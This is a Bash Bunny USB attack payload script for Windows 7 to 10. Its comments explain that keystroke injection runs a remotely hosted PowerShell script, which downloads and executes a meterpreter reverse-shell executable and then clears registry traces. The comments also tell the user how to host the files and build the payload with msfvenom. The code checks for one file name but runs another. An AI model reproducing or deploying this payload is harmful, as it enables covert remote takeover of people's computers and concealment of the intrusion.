#!/bin/bash
#
# @title: Bash bunny Windows staged meterpreter payload
# @author: Silvian Dragan
# @props: Darren Kitchen, Mubix
# @version: 1.0
# @target: Windows 7 8, 8.1 and 10.
#
#
# @details: This is an a advanced meterpreter staged payload injection using the
# rubber ducky capabilites of the bash bunny to call a powershell script referred
# to sc.txt which must be hosted on a remote server.
# This script then downloads the update.exe which is also hosted on
# a remote host, and then executes it on the target machine.
# note it will also attempt to clean up any registry footprint from the run command.
# Once the bash bunny is initialized the script should not take more than
# 2-3 sec to execute.
#
# @Dependencies: you must have sc.txt and update.exe hosted on a remote server.
# replace the 127.0.0.1 with your own host and also feel free to change the name
# of either sc.txt or update.exe to names of your choosing.
# You must also generate the appropariate update.exe payload using msfvenom for
# windows meterpreter reverse http/https/tcp etc. Please see Mubix's fantastic
# tutorials on metasploit minute/ meterpreter/ msfvenom for details. :)
#
# Colors:
#         Amber: starts the attack payload
#         Green: successful execution
#         Red: failure to load dependency ducky script
#

LED SETUP

GET SWITCH_POSITION

ATTACKMODE HID

LED ATTACK

if [ -f "/root/udisk/payloads/${SWITCH_POSITION}/ducky.txt" ]; then
        QUACK ${SWITCH_POSITION}/windows-staged-meterpreter.txt
        LED FINISH
else
    LED FAIL
    echo "Unable to load dwindows-staged-meterpreter.txt" >> /root/debuglog.txt
        exit 1
fi
